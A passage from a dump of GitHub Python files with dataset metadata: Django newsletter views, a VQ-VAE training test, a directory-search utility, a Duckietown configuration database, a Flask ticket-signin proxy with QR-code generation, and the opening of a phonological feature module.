Newsletter.',\n\t\t\t\t'data': {},\n\t\t\t}\n\t\t\t\n\t\telse:\n\t\t\tpayload = {\n\t\t\t\t'success': False,\n\t\t\t\t'message': 'An error occurred while processing your resquest.',\n\t\t\t\t'data': {'error': form.errors},\n\t\t\t}\n\n\treturn HttpResponse(json.dumps(payload), content_type='application/json')\n\ndef confirm_subscriber(request, email, conf_key):\n\tresponse = render(request, 'home/index.html')\n\tcontext = {}\n\tsubscriber = RipplesSubscribers.objects.get(email=email)\n\tif subscriber:\n\t\tform = add_subscriber(instance=subscriber)\n\t\tif form:\n\t\t\tif(conf_key == subscriber.confirmation_key):\n\t\t\t\tform = form.save(commit=False)\n\t\t\t\tform.confirmed = True\n\t\t\t\tform.save()\n\t\t\t\tresponse = render(request, 'home/email_confirm_complete.html')\n\t\t\telse:\n\t\t\t\tcontext['error'] = \"[ERROR: The provided confirmation key does not match our records]\"\n\t\t\t\tresponse = render(request, 'home/email_confirm_error.html', context)\n\t\telse:\n\t\t\tcontext['error'] = \"We could not find the listed subscriber, please contact infotech@grmw.org and report the issue.\"\n\t\t\tresponse = render(request, 'home/email_confirm_error.html', context)\n\telse:\n\t\tcontext['error'] = \"That subscriber does not exist in our database\"\n\t\tresponse = render(request, 'home/email_confirm_error.html', context)\n\treturn response\n\ndef unsubscribe(request, email, conf_key):\n\tresponse = render(request, 'home/index.html')\n\tcontext = {}\n\tsubscriber = RipplesSubscribers.objects.get(email=email)\n\tif subscriber:\n\t\tform = add_subscriber(instance=subscriber)\n\t\tif form:\n\t\t\tif(conf_key == subscriber.confirmation_key):\n\t\t\t\t#delete subscriber from database\n\t\t\t\tsubscriber.delete()\n\t\t\t\tresponse = render(request, 'home/email_unsubscribe.html')\n\t\t\telse:\n\t\t\t\tcontext['error'] = \"[ERROR: The provided confirmation key does not match our records]\"\n\t\t\t\tresponse = render(request, 'home/email_confirm_error.html', context)\n\t\telse:\n\t\t\tcontext['error'] = \"We could not find the listed subscriber, please contact infotech@grmw.org and report the issue.\"\n\t\t\tresponse = render(request, 'home/email_confirm_error.html', context)\n\telse:\n\t\tcontext['error'] = \"That subscriber does not exist in our database\"\n\t\tresponse = render(request, 'home/email_confirm_error.html', context)\n\treturn response\n\ndef ripples_dashboard(request):\n\tresponse = HttpResponseRedirect(\"/\")\n\t#make sure that we are the admin before we show this page\n\tis_admin = False\n\tgroup = Group.objects.get(name=\"Site Admin\")\n\tif group in request.user.groups.all():\n\t\tis_admin = True\n\n\tif is_admin == True:\n\t\tripples = Ripples.objects.all().order_by(\"-year\", \"-edition_id\")\n\t\tcontext = {\n\t\t\t'ripples_objects': ripples,\n\t\t}\n\t\tresponse = render(request, \"home/ripples-admin.html\", context)\n\telse:\n\t\tresponse = HttpResponseRedirect(\"/\")\n\n\n\treturn response\n\ndef send_newsletter(request):\n\tresponse = HttpResponseRedirect(\"/\")\n\tis_admin = False\n\tgroup = Group.objects.get(name=\"Site Admin\")\n\tif group in request.user.groups.all():\n\t\tis_admin = True\n\n\tif is_admin == True: \n\t\tif request.method == \"POST\":\n\t\t\t#get all ripples\n\t\t\tripple_id = request.POST.get('id_ripple')\n\t\t\tripples = Ripples.objects.all().order_by(\"-year\", \"-edition_id\")\n\t\t\tripple_to_send = ripples.filter(pk=ripple_id)[0]\n\n\t\t\t#build context and render the template with context\n\t\t\tcontext = {\n\t\t\t\t'content': request.POST.get('id_content')\n\t\t\t}\n\t\t\tctxt={\n\t\t\t\t'message': 'Ripples Newsletter Sent',\n\t\t\t\t'ripples_objects': ripples,\n\t\t\t}\n\n\t\t\t#get all subscribers\n\t\t\tsubscribers=[]\n\t\t\trecipients = RipplesSubscribers.objects.all().filter(confirmed=True)\n\t\t\tfor recipient in recipients:\n\t\t\t\tsubscribers.append(recipient.email)\n\t\t\t\tcontext['href_unsubscribe'] = \"http://\"+str(get_current_site(request))+\"/unsubscribe/\"+str(recipient.email)+\"/\"+str(recipient.confirmation_key)+\"/\"\n\t\t\t\tcontent = get_template('home/email_newsletter_template.html').render(Context(context)) \n\t\t\t\ttry:\n\t\t\t\t\t#setup and send email\n\t\t\t\t\tmessage = EmailMessage(request.POST.get('id_subject'), content, \"infotech@grmw.org\", [recipient.email,])\n\t\t\t\t\tmessage.attach_file(str(ripple_to_send.file))\n\t\t\t\t\tmessage.content_subtype = \"html\"\n\t\t\t\t\tmessage.send()\n\t\t\t\texcept:\n\t\t\t\t\tctxt['message'] = 'An error occurred - '+str(sys.exc_info()[0])\n\n\t\t\tresponse = render(request, \"home/ripples-admin.html\", ctxt)\n\treturn response", "repo_name": "tarstarkes/Icarus", "sub_path": "main/home/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 7086, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "django.db.models.Q", "line_number": 20, "usage_type": "call"}, {"api_name": "django.core.serializers.serialize", "line_number": 22, "usage_type": "call"}, {"api_name": "django.core.serializers", "line_number": 22, "usage_type": "name"}, {"api_name": "django.core.serializers.serialize", "line_number": 23, "usage_type": "call"}, {"api_name": "django.core.serializers", "line_number": 23, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 24, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 27, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 33, "usage_type": "call"}, {"api_name": "django.contrib.sites.shortcuts.get_current_site", "line_number": 45, "usage_type": "call"}, {"api_name": "django.contrib.sites.shortcuts.get_current_site", "line_number": 46, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 53, "usage_type": "call"}, {"api_name": "django.template.Context", "line_number": 53, "usage_type": "call"}, {"api_name": "django.core.mail.send_mail", "line_number": 55, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 89, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 89, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 92, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 102, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 105, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 108, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 111, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 115, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 124, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 127, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 130, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 133, "usage_type": "call"}, {"api_name": "django.shortcuts.HttpResponseRedirect", "line_number": 137, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.Group.objects.get", "line_number": 140, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.Group.objects", "line_number": 140, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.Group", "line_number": 140, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 149, "usage_type": "call"}, {"api_name": "django.shortcuts.HttpResponseRedirect", "line_number": 151, "usage_type": "call"}, {"api_name": "django.shortcuts.HttpResponseRedirect", "line_number": 157, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.Group.objects.get", "line_number": 159, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.Group.objects", "line_number": 159, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.Group", "line_number": 159, "usage_type": "name"}, {"api_name": "django.contrib.sites.shortcuts.get_current_site", "line_number": 184, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 185, "usage_type": "call"}, {"api_name": "django.template.Context", "line_number": 185, "usage_type": "call"}, {"api_name": "django.core.mail.EmailMessage", "line_number": 188, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 193, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 195, "usage_type": "call"}]} +{"seq_id": "29815611256", "text": "import os.path\nimport unittest\nfrom os import listdir\nfrom tempfile import TemporaryDirectory\n\nimport numpy as np\n\nfrom models.loaders.config import load_config\nfrom models.train_vq_vae import train\nfrom scraper import scraper\n\n\nclass VAEModelTestCase(unittest.TestCase):\n def test_training(self) -> None:\n with TemporaryDirectory() as tempdir:\n config = load_config(run_id='dummy', artifact_folder=os.path.join(tempdir, 'dummy'))\n artifact_folder = config['models']['vq_vae']['artifacts']['folder']\n config['models']['vq_vae']['artifacts']['resume_model'] = None\n\n # Override image location and filter settings\n config['data']['images']['folder'] = os.path.join(tempdir, 'img')\n config['data']['images']['filter']['include'] = None\n config['data']['images']['filter']['exclude'] = []\n config['data']['images']['filter']['orientation'] = 'any'\n\n set_no = 5159\n config['data']['images']['scraper']['first_set'] = set_no\n config['data']['images']['scraper']['last_set'] = set_no\n\n with self.subTest(f'It harvests set number {set_no}'):\n scraper.scrape(config)\n\n config['models']['vq_vae']['artifacts']['logs']['folder'] = artifact_folder\n\n # Simplify training\n config['models']['vq_vae']['data_generator']['fit_samples'] = 10\n\n num_epochs = 2\n config['models']['vq_vae']['epochs'] = num_epochs\n\n checkpoint_interval = num_epochs\n config['models']['vq_vae']['artifacts']['checkpoints']['save_every_epoch'] = checkpoint_interval\n config['models']['vq_vae']['artifacts']['reconstructions']['save_every_epoch'] = checkpoint_interval\n\n config['models']['vq_vae']['batches_per_epoch'] = 2\n\n batch_size = 2\n config['models']['vq_vae']['batch_size'] = batch_size\n\n # Dummy-train\n history = train(config)\n epoch_2_folder = os.path.join(artifact_folder, 'checkpoints', 'epoch-2')\n\n with self.subTest('The loss is a valid float'):\n assert history is not None\n last_epoch_loss = history.history.get('loss')[-1]\n self.assertFalse(np.isnan(last_epoch_loss))\n\n with self.subTest('It generates a set of artifact directories'):\n artifacts = listdir(artifact_folder)\n self.assertSetEqual(\n set(artifacts),\n {'checkpoints', 'scripts', 'reconstructions', 'tensorboard', 'logfile.txt'},\n f\"Got: {artifacts} from {artifact_folder}\")\n\n with self.subTest(f'It generates a checkpoint dir for epoch intervals of {checkpoint_interval}'):\n epochs = listdir(os.path.join(artifact_folder, 'checkpoints'))\n self.assertSetEqual(set(epochs), {'epoch-2'})\n\n with self.subTest('It generates a folder for the decoder and encoder'):\n contents = listdir(epoch_2_folder)\n self.assertIn('vq_vae', contents)\n\n samples = listdir(os.path.join(artifact_folder, 'reconstructions'))\n with self.subTest(\"It generates at least one image sample for each epoch\"):\n self.assertIn(f'epoch-{num_epochs}-1.png', samples)\n", "repo_name": "Antfield-Creations/fafa-vae", "sub_path": "tests/test_autoencoder_e2e.py", "file_name": "test_autoencoder_e2e.py", "file_ext": "py", "file_size_in_byte": 3349, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "unittest.TestCase", "line_number": 13, "usage_type": "attribute"}, {"api_name": "tempfile.TemporaryDirectory", "line_number": 15, "usage_type": "call"}, {"api_name": "models.loaders.config.load_config", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 16, "usage_type": "name"}, {"api_name": "os.path.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 21, "usage_type": "name"}, {"api_name": "scraper.scraper.scrape", "line_number": 31, "usage_type": "call"}, {"api_name": "scraper.scraper", "line_number": 31, "usage_type": "name"}, {"api_name": "models.train_vq_vae.train", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path.path.join", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 52, "usage_type": "name"}, {"api_name": "numpy.isnan", "line_number": 57, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 60, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path.path.join", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 67, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 71, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path.path.join", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 74, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 74, "usage_type": "name"}]} +{"seq_id": "41494429084", "text": "import json\r\nimport os\r\n\r\n\r\nclass FileSeach(object):\r\n def __init__(self, filter) -> None:\r\n self.__filter_ext = filter\r\n\r\n def collect(self, path) -> dict:\r\n ddir = {}\r\n ldir = []\r\n dirs = self.__subdir(path)\r\n\r\n for dir in dirs:\r\n if self.__filter(os.path.join(path,dir)):\r\n ldir.append(dir)\r\n dict = self.collect(os.path.join(path, dir))\r\n if dict:\r\n ldir.append(dict)\r\n if ldir:\r\n ddir[os.path.split(path)[1]] = ldir\r\n\r\n return ddir\r\n\r\n def __subdir(self, path) -> list:\r\n dirs_and_files = os.listdir(path)\r\n dirs = []\r\n for d in dirs_and_files:\r\n dpath = os.path.join(path, d)\r\n if os.path.isdir(dpath):\r\n dirs.append(d)\r\n return dirs\r\n\r\n def __filter(self, path) -> bool:\r\n dirs_and_files = os.listdir(path)\r\n for f in dirs_and_files:\r\n fpath = os.path.join(path, f)\r\n if os.path.isfile(fpath):\r\n ext = os.path.split(fpath)[1]\r\n if ext in self.__filter_ext:\r\n return True\r\n return False\r\n\r\n\r\nif \"__main__\" == __name__:\r\n fs = FileSeach(['CMakeLists.txt'])\r\n dict = fs.collect('D:\\\\Code\\\\Work\\\\CAT1_HPM\\\\MPU\\\\LTE01R02A09_C_SDK_U')\r\n # print(dict)\r\n print(json.dumps(dict))\r\n", "repo_name": "Nessaih/Nessaih", "sub_path": "Code/Python/Simple/FileSearch.py", "file_name": "FileSearch.py", "file_ext": "py", "file_size_in_byte": 1383, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "os.path.join", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "14509161646", "text": "from collections import defaultdict\nfrom typing import Dict, Sequence, Union\n\nimport yaml\n\nimport duckietown_code_utils as dtu\nfrom easy_node.node_description.configuration import EasyNodeConfig, load_configuration_for_nodes_in_package\nfrom .get_configuration_files import get_all_configuration_files\n\n\nclass ValidationError(Exception):\n pass\n\n\nclass ConfigDB:\n _singleton = None\n\n def __init__(self):\n # Load all configuration\n # filename2contents = look_everywhere_for_config_files()\n\n dtu.logger.debug(\"Reading configuration files...\")\n self.configs = get_all_configuration_files()\n self.package2nodes = {}\n\n packages = dtu.get_list_of_packages_in_catkin_ws()\n\n dtu.logger.debug(f\"Reading packages configuration for {packages}\")\n for p in packages:\n self.package2nodes[p] = load_configuration_for_nodes_in_package(p)\n\n dtu.logger.debug(\"Validating configuration...\")\n\n for i, c in enumerate(self.configs):\n try:\n self.validate_file(c)\n c = c._replace(valid=True)\n except ValidationError as e:\n c = c._replace(valid=False)\n c = c._replace(error_if_invalid=str(e))\n\n self.configs[i] = c\n\n def validate_file(self, c):\n # first, check that indeed we have a package by that name\n if not c.package_name in self.package2nodes:\n msg = f'Invalid package \"{c.package_name}\".'\n raise ValidationError(msg)\n # check that there is a node by that name\n if not c.node_name in self.package2nodes[c.package_name]:\n msg = f'No node \"{c.node_name}\" in package \"{c.package_name}\". '\n raise ValidationError(msg)\n # check that all the extends exist\n for cn in c.extends:\n if not self.config_exists(c.package_name, c.node_name, cn): # FIXME - doesn't exist\n msg = f\"Referenced config {c.package_name}/{c.node_name}/{cn} does not exist. \"\n raise ValidationError(msg)\n # Finally, check that the values correspond to values that we have\n # in the node configuration\n node_config = self.package2nodes[c.package_name][c.node_name]\n assert isinstance(node_config, EasyNodeConfig)\n known = node_config.parameters\n for k in c.values:\n if k not in known:\n msg = f'The parameter \"{k}\" is not known.\\nKnown: {sorted(known)}.'\n raise ValidationError(msg)\n\n def find(self, package_name: str, node_name: str, config_name, date):\n results = []\n for c in self.configs:\n match = (\n (package_name == c.package_name)\n and (node_name == c.node_name)\n and (config_name == c.config_name)\n )\n if match:\n results.append(c)\n if len(results) > 1:\n raise NotImplementedError(\"Sort by date\")\n if results:\n return results[0]\n else:\n return None\n\n def resolve(self, package_name: str, node_name: str, config_sequence: Union[list, tuple], date=None):\n \"\"\"Returns a QueryResult\"\"\"\n if len(config_sequence) == 0:\n msg = f\"Invalid empty config_sequence while querying for {package_name}/{node_name}\"\n raise ValueError(msg)\n values = {}\n origin = {}\n origin_filename = {}\n\n if not package_name in self.package2nodes:\n msg = f'Could not find package \"{package_name}\"; I know {sorted(self.package2nodes)}.'\n raise dtu.DTConfigException(msg)\n nodes = self.package2nodes[package_name]\n if not node_name in nodes:\n msg = f'Could not find node \"{node_name}\" in package \"{package_name}\"; I know {sorted(nodes)}.'\n raise dtu.DTConfigException(msg)\n\n node_config = nodes[node_name]\n all_keys = list(node_config.parameters)\n\n overridden = defaultdict(lambda: [])\n using = []\n for config_name in config_sequence:\n if config_name == \"defaults\":\n using.append(config_name)\n\n for p in list(node_config.parameters.values()):\n\n if p.has_default:\n values[p.name] = p.default\n origin_filename[p.name] = node_config.filename\n origin[p.name] = config_name\n\n else:\n c = self.find(package_name, node_name, config_name, date=date)\n if c is not None:\n using.append(config_name)\n\n for k, v in list(c.values.items()):\n if k in values:\n overridden[k].append(origin[k])\n values[k] = v\n origin_filename[k] = c.filename\n origin[k] = config_name\n\n if not using:\n msg = (\n f\"Cannot find any configuration for {package_name}/{node_name} with config sequence \"\n f\"{':'.join(config_sequence)}\"\n )\n raise dtu.DTConfigException(msg)\n\n return QueryResult(\n package_name, node_name, config_sequence, all_keys, values, origin, origin_filename, overridden\n )\n\n\ndef get_config_db() -> ConfigDB:\n if ConfigDB._singleton is None:\n ConfigDB._singleton = dtu.get_cached(\"ConfigDB\", ConfigDB)\n return ConfigDB._singleton\n\n\nclass QueryResult:\n def __init__(\n self, package_name, node_name, config_sequence, all_keys, values, origin, origin_filename, overridden\n ):\n self.all_keys = all_keys\n self.values = values\n self.origin = origin\n self.package_name = package_name\n self.node_name = node_name\n self.config_sequence = config_sequence\n self.origin_filename = origin_filename\n self.overridden = overridden\n assert isinstance(config_sequence, (list, tuple))\n\n def is_complete(self):\n return len(self.all_keys) == len(self.values)\n\n def __str__(self):\n s = f\"Configuration result for node `{self.node_name}` (package `{self.package_name}`)\"\n s += f\"\\nThe configuration sequence was {list(self.config_sequence)}.\"\n s += \"\\nThe following is the list of parameters set and their origin:\"\n s += \"\\n\" + dtu.indent(config_summary(self.all_keys, self.values, self.origin), \" \")\n return s\n\n\n# @dtu.contract(all_keys='seq(str)', values='dict', origin='dict(str:str)')\ndef config_summary(all_keys: Sequence[str], values: dict, origin: Dict[str, str]) -> str:\n table = []\n table.append([\"-\" * len(_) for _ in table[0]])\n for k in all_keys:\n if k in values:\n v = yaml.dump(values[k])\n v = v.strip()\n if v.endswith(\"...\"):\n v = v[:-3]\n v = v.strip()\n table.append([k, v, dtu.friendly_path(origin[k])])\n else:\n table.append([k, \"(unset)\", \"(not found)\"])\n return dtu.format_table_plus(table, 4)\n", "repo_name": "DailyL/Sim2Real_autonomous_vehicle", "sub_path": "evaluation_ws/src/easy_node/include/easy_node/user_config/db.py", "file_name": "db.py", "file_ext": "py", "file_size_in_byte": 7064, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "41", "api": [{"api_name": "duckietown_code_utils.logger.debug", "line_number": 22, "usage_type": "call"}, {"api_name": "duckietown_code_utils.logger", "line_number": 22, "usage_type": "attribute"}, {"api_name": "get_configuration_files.get_all_configuration_files", "line_number": 23, "usage_type": "call"}, {"api_name": "duckietown_code_utils.get_list_of_packages_in_catkin_ws", "line_number": 26, "usage_type": "call"}, {"api_name": "duckietown_code_utils.logger.debug", "line_number": 28, "usage_type": "call"}, {"api_name": "duckietown_code_utils.logger", "line_number": 28, "usage_type": "attribute"}, {"api_name": "easy_node.node_description.configuration.load_configuration_for_nodes_in_package", "line_number": 30, "usage_type": "call"}, {"api_name": "duckietown_code_utils.logger.debug", "line_number": 32, "usage_type": "call"}, {"api_name": "duckietown_code_utils.logger", "line_number": 32, "usage_type": "attribute"}, {"api_name": "easy_node.node_description.configuration.EasyNodeConfig", "line_number": 61, "usage_type": "argument"}, {"api_name": "typing.Union", "line_number": 85, "usage_type": "name"}, {"api_name": "duckietown_code_utils.DTConfigException", "line_number": 96, "usage_type": "call"}, {"api_name": "duckietown_code_utils.DTConfigException", "line_number": 100, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 105, "usage_type": "call"}, {"api_name": "duckietown_code_utils.DTConfigException", "line_number": 135, "usage_type": "call"}, {"api_name": "duckietown_code_utils.get_cached", "line_number": 144, "usage_type": "call"}, {"api_name": "duckietown_code_utils.indent", "line_number": 169, "usage_type": "call"}, {"api_name": "typing.Sequence", "line_number": 174, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 174, "usage_type": "name"}, {"api_name": "yaml.dump", "line_number": 179, "usage_type": "call"}, {"api_name": "duckietown_code_utils.friendly_path", "line_number": 184, "usage_type": "call"}, {"api_name": "duckietown_code_utils.format_table_plus", "line_number": 187, "usage_type": "call"}]} +{"seq_id": "27536844914", "text": "\"\"\"\nA proxy whilst the api doesn't have the proper csrf headers\n\"\"\"\nimport os\nimport json\nimport base64\nimport logging\nimport platform\nfrom io import BytesIO\nfrom pprint import pprint\nfrom os.path import join, exists, expandvars\n\nimport flask\nimport qrcode\nimport requests\n\nfrom webassets_babel import BabelFilter\nfrom webassets import Environment, Bundle\nfrom webassets.exceptions import FilterError\nfrom webassets.filter import register_filter\n\nlogging.basicConfig(level=logging.DEBUG)\n\napp = flask.Flask(__name__)\nmy_env = Environment(directory='static/', url='static/')\nmy_env.debug = 'HEROKU' not in os.environ\n\nif platform.system() == 'Windows':\n npm = expandvars('%AppData%/npm')\n my_env.config.setdefault('BABEL_BIN', join(npm, 'babel.cmd'))\n PRESET_PATH = join(npm, \"node_modules/RedQR/\")\nelse:\n PRESET_PATH = \"/app/\"\nPRESET_PATH = join(PRESET_PATH, \"node_modules\")\nassert exists(PRESET_PATH)\nPRESETS = ['react', 'es2015']\nPRESETS = ','.join(\n join(PRESET_PATH, 'babel-preset-{}'.format(name))\n for name in PRESETS\n)\n\n\n@register_filter\nclass BetterBabelFilter(BabelFilter):\n def get_executable_list(self, input_filename, output_filename):\n return (\n super().get_executable_list(input_filename, output_filename) +\n ['--presets', PRESETS]\n )\n\n\ndef build_bundles():\n js = Bundle(\n 'js/api.js',\n 'js/camera.js',\n 'js/qr_scanner.jsx',\n 'js/screen.jsx',\n 'js/options.jsx',\n 'js/main.jsx',\n filters=(\n 'babel',\n # 'jsmin'\n ),\n output='gen/packed.js'\n )\n js.config.babel_options = {\n 'highlightCode': False,\n }\n my_env.register('js_all', js)\n deps = Bundle(\n \"js/vendor/jquery.dev.js\",\n \"js/vendor/foundation.min.js\",\n \"js/vendor/llqrcode.js\",\n \"js/vendor/modernizr-latest.js\",\n \"js/vendor/underscore.js\",\n \"js/vendor/react/react-with-addons.js\",\n \"js/vendor/react/react-dom.js\",\n filters='jsmin',\n output='gen/deps.js'\n )\n my_env.register('deps', deps)\n return my_env\n\n\ndef get_urls():\n try:\n urls = my_env['js_all'].urls()\n deps = my_env['deps'].urls()\n\n pprint(urls + deps)\n\n return deps + urls\n except FilterError as e:\n e.args = (e.args[0].replace('\\\\n', '\\n'),)\n raise e\n\n\n@app.route(\"/\")\ndef index():\n return flask.render_template('index.html', urls=get_urls())\n\n\ndef build_image(data):\n img = qrcode.make(data)\n\n fh = BytesIO()\n img.save(fh)\n b64 = base64.b64encode(fh.getvalue())\n\n return b'data:image/png;base64,' + b64\n\n\n@app.route(\"/tests\")\ndef tests():\n with open('static/tests.json') as fh:\n tests = json.load(fh)\n\n images = {\n k: {\n \"desc\": v['desc'],\n \"img\": build_image(k).decode()\n }\n for k, v in tests.items()\n }\n\n return flask.render_template('tests.html', tests=images)\n\n\n@app.route(\"/ticket/signin\")\ndef proxy_signin():\n r = requests.request(\n flask.request.method,\n 'http://events.rflan.org/ticket/signin',\n params=flask.request.args\n )\n if not r.ok:\n print(r.text)\n raise flask.HTTPError(r.status_code)\n return r.text\n\n\n@app.route(r\"/.well-known/acme-challenge.*\")\ndef lets_encrypt():\n return os.environ.get(\n 'LETS_ENCRYPT_CHALLENGE',\n 'not set'\n )\n\n\nif __name__ == '__main__':\n print('building bundles')\n build_bundles()\n get_urls()\n print('bundles built')\n\n app.run('0.0.0.0', os.environ.get(\"PORT\", 8888), my_env.debug)\n", "repo_name": "Mause/js_qr_scanner", "sub_path": "proxy.py", "file_name": "proxy.py", "file_ext": "py", "file_size_in_byte": 3598, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "logging.basicConfig", "line_number": 22, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 22, "usage_type": "attribute"}, {"api_name": "flask.Flask", "line_number": 24, "usage_type": "call"}, {"api_name": "webassets.Environment", "line_number": 25, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 26, "usage_type": "attribute"}, {"api_name": "platform.system", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path.expandvars", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "webassets_babel.BabelFilter", "line_number": 44, "usage_type": "name"}, {"api_name": "webassets.filter.register_filter", "line_number": 43, "usage_type": "name"}, {"api_name": "webassets.Bundle", "line_number": 53, "usage_type": "call"}, {"api_name": "webassets.Bundle", "line_number": 70, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 90, "usage_type": "call"}, {"api_name": "webassets.exceptions.FilterError", "line_number": 93, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 100, "usage_type": "call"}, {"api_name": "qrcode.make", "line_number": 104, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 106, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 108, "usage_type": "call"}, {"api_name": "json.load", "line_number": 116, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 126, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 131, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 132, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 134, "usage_type": "attribute"}, {"api_name": "flask.HTTPError", "line_number": 138, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 144, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 144, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 156, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 156, "usage_type": "attribute"}]} +{"seq_id": "4865263989", "text": "#!/usr/bin/env python3\n# coding: utf-8 \n\n'''\na module that identifies all unique natural classes defined by the feature combinations in a table of phonological features.\n\ndependencies are standard modules (itertools, sys, os)\n\nThe main functions:\n\nFEAT LIST TO SEGS LOOKUP\n\tfeats_to_segs_wrapper(featlist, featfilepath)\t\n\nNAT CLASS DICTIONARY\n\twrap_classes(featfilepath)\n\nGETTING ALL THE CONSONANTS\n\tget_consonants(featfilepath)\n\nLook through the rest for more\n\n'''\n\nimport os\nimport itertools\nimport sys\n\n\nimport messages as msg\n\n\n\ndef read_feat_file(featfilepath, **kwargs):\n\t'''\n\tthe input argument is a path to features.txt, tab-formatted according to Hayes and Wilson rules\n\treturns a vector of feature names, and a vector of segments plus their feature values in order\n\tfeatnames: [syll, cons, son, dor, ...]\n\tseglines: [k, -, -, -, +, ...] \n\t'''\n\ttry:\n\t\twith open(featfilepath, 'r', encoding='utf-8') as f:\n\t\t\tfeats = f.readlines()\n\t\t\tfeatnames = feats[0].strip().split('\\t')\n\t\t\tseglines = [x.strip().split('\\t') for x in feats[1:]]\n\t\t\treturn (featnames,seglines)\n\texcept FileNotFoundError:\n\t\tmsg.env_render(message=f'could not open {featfilepath}', **kwargs)\n\t\traise SystemExit\n\ndef segs_to_feats(featlines, **kwargs):\n\t'''\n\ttakes as 